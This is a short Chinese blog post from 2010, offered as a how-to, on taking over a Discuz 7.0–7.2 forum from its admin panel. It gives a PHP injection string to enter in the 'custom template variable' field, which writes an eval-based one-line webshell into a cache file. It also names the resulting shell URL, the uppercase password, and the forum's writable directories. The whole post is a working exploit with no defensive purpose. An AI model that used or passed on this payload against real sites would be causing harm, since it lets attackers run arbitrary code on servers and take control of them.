13 07 2010

不需要创始人，只需要管理员。
http://www.fuck.com/admincp.php?action=styles&operation=edit&id=1&adv=1
中，最下面有个“自定义模板变量”，变量中填：
PHP代码
OLDJUN', '#999');eval($_POST[cmd]);//
替换内容随便输入：1111，然后提交，一句话木马就产生了：
http://www.fuck.com/forumdata/cache/style_1.php
如果你修改的style的id是2的话，对于的shell就是style_2.php。
注：很多人反应连不上一句话：
PHP代码
$evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";
这句话是说所有的变量名换成大写的了！
因此请用大写的CMD做为你一句话的密码！
附dz可写目录：
?附件目录 默认是 ./attachments
?数据目录 ./forumdata
?缓存目录 ./forumdata/cache
?数据目录 ./forumdata/templates
?主题缓存目录 ./forumdata/threadcaches
?缓存目录 ./forumdata/logs
?缓存目录 ./uc_client/data/cache
?缓存目录 ./uc_server/data
?缓存目录 ./uc_server/data/cache
?缓存目录 ./uc_server/data/view
?缓存目录 ./uc_server/data/avatar
?缓存目录 ./uc_server/data/logs
?缓存目录 ./uc_server/data/backup
?缓存目录 ./uc_server/data/tmp

discuz, webshell

清除某个数据库的所有数据库连接的存储过程 Discuz 7.0-7.2后台攻取webShell方法